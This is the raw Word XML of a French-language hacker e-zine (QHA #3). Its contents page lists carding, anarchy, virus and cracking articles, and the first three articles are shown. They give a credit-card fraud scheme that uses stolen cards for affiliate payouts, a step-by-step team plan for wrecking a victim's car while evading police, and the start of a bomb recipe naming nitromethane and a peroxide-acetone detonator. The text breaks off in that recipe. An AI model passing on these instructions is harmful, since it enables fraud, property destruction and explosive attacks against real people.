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             __                 __         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QQQQQQ\        |HH|              |HH|     /AAAAAA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 ¯¯¯¯¯ |QQ|      |HH|              |HH|     |AA|¯¯¯¯¯¯|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              |QQ|      |HH|______|HH|     |AA|______|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            _|QQ|      |HHHHHHHHH|     |AAAAAAA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        |QQQQ|      |HHHHHHHHH|     |AAAAAAA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__   |QQQQ|       |HH|¯¯¯¯¯¯|HH|     |AA|¯¯¯¯¯¯ |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QQQQQQQ\      |HH|              |HH|     |AA\             /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QQQ|     |HH|              |HH|     |AAA|       |AAA|</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rPr>
        <w:t>¯¯¯       ¯¯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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    "We Are Everywhere"</w:t>
        <w:tab/>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ab/>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ab/>
        <w:t xml:space="preserv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ab/>
        <w:t xml:space="preserve">                       *                           QHA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E-Zine #3                          *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ab/>
        <w:t xml:space="preserve">                       *               http://www.q-h-a.com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t xml:space="preserve">                       *                 dukester@hehe.c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ab/>
        <w:t xml:space="preserv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Introduc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Salut, et bienvenu au e-zine #3 des Quebec Hacker's Alli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Le premier zine a été faite par toute la team et il y a eu beaucoup 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remarques comme quoi que notre zine étais lamer etc etc donc j'ava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décidé d'en faire une deuxieme pour les beaucoup plus avancé po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as que le monde chiale, j'ai donc demandé a Clad Strife de faire u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zine a lui toute seul pour beacoup plus avancé, sa a été tres réuss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aufe que le monde etais pas content vu que c'etais faite par u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eul personne... donc j'ai décidé de faire un zine pour personne bc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s avancé mais faite par toute la team... sa revient au meme mais c'e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plus long a faire donc c'est ce que je vous présente: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QHA's E-zine #3</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Mot au 912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D'apres moi le but premier du hacker c'est d'aider le mon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de l'informatique et de le faire avancé en trouvant des failles et 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montrant au monde comment se proteger des probleme et des fail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informatique toute en programmant etc etc... Mais étant des hack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je ne voit pas pkoi on ne ferait pas la meme chose; d'aider la société</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mais, pour la vrai vie, et le probleme #1 dans la société et dailleur l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ause des guerres et des problemes de cette terre est la jalousie et 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vouloir etre tjs le meilleur.. donc SVP la les 912 ok, le gros proble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de depart entre nos deux crew c'est de vouloir toujours surpassé</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l'autre... en lui prouvant qu'on est meilleurs eh bien personnelle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je commence a etre ecoeurer de ca et je trouve ca complète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Immature... donc svp arreter de nous ecoeurer! Et nous ferons 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meme... moi j'ai dit a toute nos membres de tout simplement ignor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eux qu'y viennent nous ecoeurer! Eh bien faite pareille... mais cess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de tjs venir nous ecoeurer car en se moment on dirai que votre b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1 cer de nous ecoeurer... c'est tout ske vous faite, alors svp arre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a et plutot concentrer vous sur l'avancement de la scene!! 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jusqu'ici nous avons tous eu but commun c'est de faire avancé</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l'underground Quebecois... et non d'etre le meilleur donc arre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de toujours vouloir vous faire remarquer en nous niasant ma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tot en travaillant pour votre crew... Merci beaucoup! J'esp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que vous serez assez mature pour comprendre et mettre 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ratique ce paragrap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Avertiss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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Veuillez prendre note que tout ce qui est inscrit dans ce qui suit n'est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t xml:space="preserve">qu'a but educatif. Les auteurs de ces articles retirent la responsabilite de c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t xml:space="preserve">que vous en faites. En bon quebecois "C pas notre probleme sti". Et avant d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t>continuer n'oubliez pas que vous n'avez aucun droit de copier ces article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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">QHA Menu       </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3.1  Carding: Truc pour de l'argent carder, par Fr0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3.2 Anarchy:  Rendre une voiture inutilisable, par Pikash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3.3 Anarchy: Création d'une bombe, par Pikash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3.4 Anarchy: Comment voler des article de tabac, par Pikash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3.5 Anarchy: Création d'une bombe #2, par Pikashu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rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">| 3.6 Protection de windows, par Dukest4r                                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>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3.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Récupérer d'un e-mail avec le JavaScript, par Clad Strife                                             </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3.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>UNIX, par Clad Str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3.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les proxys et les firewalls, par Clad Str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3.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les virus, par Clad Str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3.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les mouchards, par Clad Str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3.12 Carding: Truc divers pour se trouver des cc#, par Dukest4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3.13 Un de mes truc préféré pour faire chier n'importe qui, par Dukest4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3.14 Quelques Techniques sur le cracking en HEX, par Dukest4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3.15 Les processeurs Mac du debut a 1996, par £c0nfuz3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______________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________________________________________________________________))==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________________________________________</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3.1 Carding: Truc pour de l'argent carder, par Fr0d</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omment se faire du cash facilement sans meme avoir la police au cul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Ingredients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1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="360" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="36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Carte de credit </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="360" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Un sponsor qui paye tant au sign-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="360" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Un site gratuit la genre angelfire.com</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e premier probleme a resoudre est de trouver un bon sponsor qui paye cher et qui ne cross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pas le monde. Mais moi je suis trop gentil et ma vous donner un bon sponsor qui a pas d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protection ou presque et qui paye environ 80% de ce que vous aller biller de la carte de credit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Maximumcash.com Apres avoir appliquer en mettant votre VRAI adresse pour le cheque ou</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adresse de shipping, vous devez mettre les donnees dune des diverse banners du sponso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pres tout cela, si vous navez pas de carte de credit et vous etes desesperer pcq vous ete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incompetant, essayer un des trucs qui est donner dans le E-zine #1 pour fourrer qq1. Si vou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en avez une qui marche eh bien vous etes a 2 minutes davoir largent. Vous avez a clicker su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votre propre banner et aller dans le formulaire pour devenir membre. Vous remplisser tous le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ases et voilà le tour est jouer. Mais un tit conseil…si vous voulez vraiment etre sur de pa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voir la police au cul vous avez 2 choix. Vous trouver un carte outremer genre une qui vient d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Tokyo comme ca le chintok qui a cette carte de credit pis qui vois que ya ete crosser pou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metton 60$US ben y va pas ben ben essayer de vous poursuivre pcq vous etes po mal loin pi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a en plus y rentrerais po dans son argent si y vous poursuivrais…Le deuxieme choix c d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demander a Fr0d qui vous card votre sponsor…mais Helas Fr0d ne veux pas risquer sa vi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pour erien… Il veut 2 cartes de credit en echange de un sign up, comme ca lui aussi y va</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pouvoir ce faire du cash ! LOL</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_______________________________________________________________________</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3.2 Anarchy: Comment rendre une voiture completement inutilisable en moins de 3 minute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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Matériel nécéssaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- des gants en plastique pour chaque personne (que vous aurez piqués chez votre dentiste par exemple), ces gants serviront a prévenir des empreintes éventuelles mais il faut que vous aillez les doigts agiles donc évitez les gros gants en cuir... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- du courage, de la malice : ne pas faire ça dans une rue pleine de monde, en pleine journée et sur une voiture a 50 M d'un comissariat de police.... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- un petit couteau (cran d'arrêt) bien tranchant </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- de la porcelaine (zut maman, j'ai cassé ton vase... et vous prenez quelques morceaux) ou de l'étain (dites monsieur le professeur de chimie, je peux voir c'est comment l'etain? Oh! zut! Un morceau est tombé par terre, je vais le ramasser, et hop un morceau dans la poche), sinon pour la porcelaine, vous pourez la trouver sur place dans la voiture ( les bougies sont faites en partie de porcelaine, casser en une et vous aurez de la porcelaine, mais attention cette technique allonge fortement le TEMPS de l'opération, donc les risques de se faire prendre...) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- 3 tournevis et 2 marteaux </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- une pomme de terre de taille moyenne, une sarbacane et un pétard pirate </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- plus ou moins 250 grammes de sucre en BLOC, si vous utilisez du sucre en poudre, il faudra le mettre dans du café pour qu'il se dilue... : a éviter </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">Bon, je pense que ce sera tout ! </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">Pour commencer, renseignez vous sur quelle sorte de voiture possède votre victime: c'est a dire, où il la gare généralement, la plaque d'immatriculation, la couleur, le nombre de carreaux (par exemple une voiture 3 portes en aura 4 + 2 parre brises, une 5 portes break en aura 6 + 2 parre brises, une Renault 4L en aura10 + 2 parre brises) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Au programme de l'opération</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Faire éclater les 4 Pneus , Destroyer TOUTES les vitres en un temps record, bloquer le pot d'échapement, faire du caramel dans le moteur.... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">L'idéal pour cette opération c'est d'être à 4 ou 5, avoir l'air décontracté, chacun aura son rôle et s'occupera de SA mission et ne gênera pas les autres. Tout le monde arrivera autour de la voiture, mais tout le monde n'agira pas en même temps. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">PERSONNE n°1 : cette personne aura besoin du double de morceaux de porcelaine ou d'etain qu'il n'y a de vitres sur la voiture ( le double: comme ça il aura droit a 1 erreur par vitre, mais vaut mieux ne faire AUCUNE erreur pour cause de temps. cette personne lancera un morceau de porcelaine sur le carreau avec force, il devra être plus ou moins perpandiculaire à la vitre qu'il vise, il devra donc faire un tour complet de la voiture pour éclater toutes les vitres, à moins qu'il ne lance les morceaux a travers les vitres éclatées si elle est garée contre un mur... cette personne devrait d'abord essayer "le lancement de porcelaine" sur une vitre quelconque pour savoir avec quelle force lancer la pierre et avec quel angle par rapport à la vitre ( ATTENTION: les vitres latérales sont presque droite, donc ca devrait se faire perpendiculairement et meme un peu en oblique ( un peu, pas beaucoup, 20 ou 30 centimètres) mais les pares brises sont légèrement bombés donc ce sera plus dificile ... Cette personne commencera pour démolir la vitre du coté conducteur pour que la personne n°2 puisse agir au plus vite. Cette personne doit avoir de la force dans les bras. ATTENTION : Si vous vous attaquez à une bagnole de flic, je ne suis pas sur que cette technique fonctionne parce que n'oubliez pas que les parres brises des voitures de police sont beaucoup plus résistantes (sont bombés, cf. cours de physique) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">PERSONNE n°2 : cette personne se munira d'un cran d'arrêt et d'un marteau. Avec le cran d'arrêt, elle éclatera les 4 pneus , qu'elle mette une casquette ou un chapeau de pêcheur pasque vu que les pneux sont un peu en dessous des vitres, elle doit faire attention là où se trouve la personne n°1 pour ne pas se prendre les éclats de verre dans la figure. Avec son marteau, elle cassera le tableau de bord, et ensuite avec son cran d'arret (qu'il aura gardé ouvert tout au long de l'opération) déchirera les fauteuils ( en passant le bras par les vitres brisées) Comme cette tâche est une des plus rapides de cette opération, elle poura aider la personne n°1 dans son travail. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">PERSONNE n°3 : Elle se munira du sucre en bloc, d'un gros tournevis plat bien solide, de la sarbacane , du petard pirate et de la patate. D'abord, elle se dirigera vers l'entrée d'essence (ou de diesel peu importe), elle ouvrira la petite porte pour mettre le sucre dans le réservoir (on peut penser que le sucre sera inutile puisque la voiture sera inutlisable, mais au moins, le propriétaire ne pourra pas vendre les pièces du moteur), si c'est fermé à clef, que la personne force le tout avec son tournevis, si au bout de 40 sec elle n'a pas réussi, elle se dirigera vers le pot d'échapement , allumera le petard pirate, le mettra dans la sarbacane, soufflera avec force pour que le pétard aille le plus loin possible dans le pot, puis mettra la patate pour boucher le pot ( qu'elle la tasse bien de manière a ce que ce soit hermétique) puis qu'elle se recule parce que ça risque de faire quelques dégâts en dessous de la voiture ( le simple fait de se relever et de retirer ses jambes de devant le pot suffiront, attention, la patate risque de se diriger a grande vitesse comme un boulet de canon vers la sortie du pot ( si c'est vraiment bien hermétique et que c'est un GROS pétard), puis si les autres n'ont pas fini leur travail, elle pourra se réattaquer au réservoir. Cette personne doit avoir un soufle assez puissant pour la sarbacane. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">PERSONNE n°4 : Elle se munira d'un tournevis en croix, d'un tournevis plat solide et d'un marteau, elle dévissera les plaques et les jettera dans un caniveau, à moins qu'elle ne préfère les garder, un sac a dos serait alors le bienvenu. Une fois ce travail effectué, elle se munira du tournevis plat solide et du marteau, mettra le tourne vis plat sur les serures puis tapera un coup sec avec le marteau de manière a bien casser la serrure pour qu'on ne puisse plus y mettre de clé, on va péter les serrures pas pour rentrer dans la voiture puisque la personne n°1 aura cassé les vitres. Comme cette tache est l'une des plus rapides de cette opération, elle pourra aider la personne n° 2 dans son travail (les sièges). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>L'ordre d'intervention des missionnaires:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">Tout le monde arrive en meme temps a la voiture, la persone n°3 commencera en meme temps que la personne n°4 , la personne n°1 et n°2 commenceront en meme temps mais une vingtaine de seconde après la n°3 &amp; n°4. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Temps de l'opération</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> : - la personne n°1 : si elle est calme et quelle sait comment lancer les morceaux, cela peut se faire en 1 minutes </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- la personne n°2 : pour les pneux : 30 sec, pour le tableau de bord 30 sec, pour les sièges 1 minute 30 sec à 2 minutes. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- la personne n°3 : pour le sucre 15 sec si il n'y a pas le vérouillage de la serrure du pot comme 45 sec si vérouillage, pour le sucre et la patate: 10 sec ( ATTENTION: lorsque le petard pirate est gratté sur la boite d'allumette, il explose après 8 secondes --&gt; il faut être entrainné à l'allumer , le mettre dans la sarbacane, soufler dans le pot puis mettre la patate, pour l'entrainement, pas besoin de faire exploser des dizaines de petards, qquelqu'un n'a qu'à calculer le temps avec un chronomètre) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">- la personne n°4 : pour les plaques:10 sec par vis --&gt; 50 sec(car déplacement) , puis 1 minute pour les serrures </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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t xml:space="preserve">Le temps total ne peut pas dépasser les 3 minutes, cette opération provoque beaucoup de bruit: éclats des vitres, et le petard. Les 4 personnes devront donc s'entrainer au Sprint, et a l'endurence avant de s'attaquer a une mission pareille: en effet, une personne pourrait intervenir et compromettre cette mission ou appeller les flics, vous avez donc très peu de temps pour le bon déroulement l'opération et pour détaler. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Bonne chance...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>fait par pickashu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>correction des fautes par clad strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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___________________________</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3.3 Anarchy: Création d'une bomb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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>materiel:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Nitromethane              (pour les avions teleguides)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ammoniaque clair          (pour laver les vitres)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Petit detonateur electrique fait avec du peroxiacetone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
